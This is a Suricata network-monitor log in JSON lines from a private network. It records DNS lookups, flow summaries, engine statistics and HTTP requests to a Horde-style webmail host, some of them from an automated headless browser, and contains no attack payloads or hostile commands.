{"timestamp":"2020-02-29T00:17:27.267472+0000","flow_id":1466579625143878,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60762,"proto":"UDP","dns":{"type":"answer","id":35202,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:27.267472+0000","flow_id":1466579625143878,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60762,"proto":"UDP","dns":{"type":"answer","id":35202,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:27.371073+0000","flow_id":1424381571475841,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17052,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:27.479187+0000","flow_id":1424381571475841,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34842,"proto":"UDP","dns":{"type":"answer","id":17052,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:27.479187+0000","flow_id":1424381571475841,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34842,"proto":"UDP","dns":{"type":"answer","id":17052,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:17:28.000481+0000","flow_id":1565664501029723,"event_type":"flow","src_ip":"192.168.10.122","src_port":42020,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:27.645979+0000","end":"2020-02-29T00:12:27.754252+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:28.721639+0000","flow_id":2225289892430090,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52768,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5559},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":29494,"tx_id":1}} {"timestamp":"2020-02-29T00:17:29.000319+0000","flow_id":1151071323182789,"event_type":"flow","src_ip":"192.168.10.130","src_port":34852,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":2061,"bytes_toclient":1048,"start":"2020-02-29T00:16:20.087749+0000","end":"2020-02-29T00:16:28.369273+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:29.282797+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34864,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) 
AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/contact.php?source=dDQI2mfGX-cQemxh4GC5uHK&key=oZ_HnvDV1RzcsAiiL_PzNnX&view=Contact","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6988},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37030,"tx_id":0}} {"timestamp":"2020-02-29T00:17:29.293462+0000","flow_id":645583741745750,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57080,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:29.401593+0000","flow_id":645583741745750,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51707,"proto":"UDP","dns":{"type":"answer","id":57080,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:29.401593+0000","flow_id":645583741745750,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51707,"proto":"UDP","dns":{"type":"answer","id":57080,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:29.490446+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34864,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5124}} {"timestamp":"2020-02-29T00:17:31.000306+0000","flow_id":1009264372926241,"event_type":"flow","src_ip":"192.168.10.122","src_port":50814,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:30.444193+0000","end":"2020-02-29T00:12:30.552573+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:32.000182+0000","event_type":"stats","stats":{"uptime":14704,"capture":{"kernel_packets":136375,"kernel_drops":0},"decoder":{"pkts":136386,"bytes":93749613,"invalid":192,"ipv4":134859,"ipv6":10,"ethernet":136386,"raw":0,"null":0,"sll":0,"tcp":129446,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"clo
sed_pruned":2786,"new_pruned":16,"est_pruned":2428,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22151,"memcap_state":0,"memcap_global":0},"http":{"memuse":53676,"memcap":0}}} {"timestamp":"2020-02-29T00:17:34.495901+0000","flow_id":779573836303470,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34864,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5124},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":24087,"tx_id":1}} {"timestamp":"2020-02-29T00:17:35.000918+0000","flow_id":1661936193407531,"event_type":"flow","src_ip":"192.168.10.122","src_port":56201,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:34.494123+0000","end":"2020-02-29T00:12:34.602655+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:35.001148+0000","flow_id":964081317209505,"event_type":"flow","src_ip":"192.168.10.122","src_port":58854,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:34.681377+0000","end":"2020-02-29T00:12:34.789685+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:17:36.000818+0000","flow_id":1937329496453146,"event_type":"flow","src_ip":"192.168.10.122","src_port":38808,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:12:34.913434+0000","end":"2020-02-29T00:12:35.022032+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:38.000914+0000","flow_id":571869214283118,"event_type":"flow","src_ip":"192.168.10.130","src_port":34856,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":11,"bytes_toserver":1223,"bytes_toclient":9670,"start":"2020-02-29T00:16:32.005486+0000","end":"2020-02-29T00:16:37.187743+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:17:39.000237+0000","event_type":"stats","stats":{"uptime":14711,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2786,"new_pruned":16,"est_pruned":2432,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21158,"memcap_state":0,"memcap_global":0},"http":{"memuse":36692,"memcap":0}}} 
{"timestamp":"2020-02-29T00:17:39.002411+0000","flow_id":745403072685010,"event_type":"flow","src_ip":"192.168.10.130","src_port":34854,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":15,"bytes_toserver":2042,"bytes_toclient":12710,"start":"2020-02-29T00:16:28.369618+0000","end":"2020-02-29T00:16:38.383459+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:39.002598+0000","flow_id":2162338538366341,"event_type":"flow","src_ip":"192.168.10.122","src_port":38589,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:38.435589+0000","end":"2020-02-29T00:12:38.543962+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:45.000418+0000","flow_id":1172073699101454,"event_type":"flow","src_ip":"192.168.10.122","src_port":35264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:44.805646+0000","end":"2020-02-29T00:12:44.913873+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:45.001175+0000","flow_id":224552373988062,"event_type":"flow","src_ip":"192.168.10.122","src_port":54903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:44.600798+0000","end":"2020-02-29T00:12:44.709050+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:17:45.001359+0000","flow_id":1915120221140576,"event_type":"flow","src_ip":"192.168.10.122","src_port":34113,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:43.898656+0000","end":"2020-02-29T00:12:44.006850+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:46.000182+0000","event_type":"stats","stats":{"uptime":14718,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095040},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2788,"new_pruned":16,"est_pruned":2433,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":3,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checke
d":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19838,"memcap_state":0,"memcap_global":0},"http":{"memuse":36612,"memcap":0}}} {"timestamp":"2020-02-29T00:17:46.002322+0000","flow_id":989009308065649,"event_type":"flow","src_ip":"192.168.10.122","src_port":41034,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:44.958321+0000","end":"2020-02-29T00:12:45.066699+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:48.000764+0000","flow_id":1965379946389945,"event_type":"flow","src_ip":"fe80:0000:0000:0000:f816:3eff:fe73:695a","dest_ip":"ff02:0000:0000:0000:0000:0000:0000:0002","proto":"IPv6-ICMP","icmp_type":133,"icmp_code":0,"flow":{"pkts_toserver":1,"pkts_toclient":0,"bytes_toserver":70,"bytes_toclient":0,"start":"2020-02-29T00:17:17.958905+0000","end":"2020-02-29T00:17:17.958905+0000","age":0,"state":"new","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:50.000513+0000","flow_id":1057054490648417,"event_type":"flow","src_ip":"192.168.10.81","src_port":52766,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":9,"pkts_toclient":13,"bytes_toserver":1099,"bytes_toclient":10115,"start":"2020-02-29T00:16:44.024417+0000","end":"2020-02-29T00:16:49.489828+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:17:50.000663+0000","flow_id":101213813529097,"event_type":"flow","src_ip":"192.168.10.130","src_port":34858,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":19,"bytes_toserver":1416,"bytes_toclient":20622,"start":"2020-02-29T00:16:38.383497+0000","end":"2020-02-29T00:16:49.869586+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:52.000591+0000","flow_id":340808549256710,"event_type":"flow","src_ip":"192.168.10.122","src_port":59515,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:51.118278+0000","end":"2020-02-29T00:12:51.226233+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:17:52.001953+0000","flow_id":1932059572600311,"event_type":"flow","src_ip":"192.168.10.122","src_port":49307,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:50.949751+0000","end":"2020-02-29T00:12:51.058015+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:17:53.000183+0000","event_type":"stats","stats":{"uptime":14725,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2790,"new_pruned":17,"est_pruned":2437,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":0,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18848,"memcap_state":0,"memcap_global":0},"http":{"memuse":36532,"memcap":0}}} 
{"timestamp":"2020-02-29T00:17:53.002632+0000","flow_id":363769459871467,"event_type":"flow","src_ip":"192.168.10.130","src_port":34860,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1154,"bytes_toclient":654,"start":"2020-02-29T00:16:47.167659+0000","end":"2020-02-29T00:16:52.301912+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:17:59.499151+0000","flow_id":744964991983055,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27338,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:17:59.609546+0000","flow_id":744964991983055,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46162,"proto":"UDP","dns":{"type":"answer","id":27338,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:17:59.609546+0000","flow_id":744964991983055,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46162,"proto":"UDP","dns":{"type":"answer","id":27338,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:17:59.702081+0000","flow_id":880338066172632,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52770,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5753}} {"timestamp":"2020-02-29T00:18:00.000341+0000","event_type":"stats","stats":{"uptime":14732,"capture":{"kernel_packets":136388,"kernel_drops":0},"decoder":{"pkts":136391,"bytes":93749943,"invalid":192,"ipv4":134864,"ipv6":10,"ethernet":136391,"raw":0,"null":0,"sll":0,"tcp":129451,"udp":5206,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2804,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2820,"synack":2811,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1841,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2382,"failed_udp":112},"tx":{"http":4708,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2462}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2439,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":88251,"memcap":0}}} 
{"timestamp":"2020-02-29T00:18:00.001510+0000","flow_id":859365721232905,"event_type":"flow","src_ip":"192.168.10.122","src_port":39736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:12:59.579081+0000","end":"2020-02-29T00:12:59.687284+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:03.353729+0000","flow_id":1572605190170049,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64132,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:03.458627+0000","flow_id":1572605190170049,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59238,"proto":"UDP","dns":{"type":"answer","id":64132,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:03.458627+0000","flow_id":1572605190170049,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59238,"proto":"UDP","dns":{"type":"answer","id":64132,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:03.630319+0000","flow_id":2196762722510294,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34868,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7319}} 
